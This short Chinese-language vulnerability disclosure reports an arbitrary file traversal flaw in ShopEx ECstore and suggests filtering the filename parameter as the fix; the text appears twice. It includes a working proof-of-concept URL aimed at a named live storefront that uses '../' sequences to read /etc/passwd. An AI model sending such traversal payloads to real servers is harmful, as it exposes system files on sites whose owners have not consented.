ShopE旗下产品ECstore任意文件遍历漏洞
官方主站:http://ecstore.shopex.cn/在官方宣传上有成功案例:

http://mall.brands.com.tw/ec
http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd

修复方案:
对filename进行过滤
ShopE旗下产品ECstore任意文件遍历漏洞
官方主站:http://ecstore.shopex.cn/在官方宣传上有成功案例:

http://mall.brands.com.tw/ec
http://mall.brands.com.tw/ec/index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd

对filename进行过滤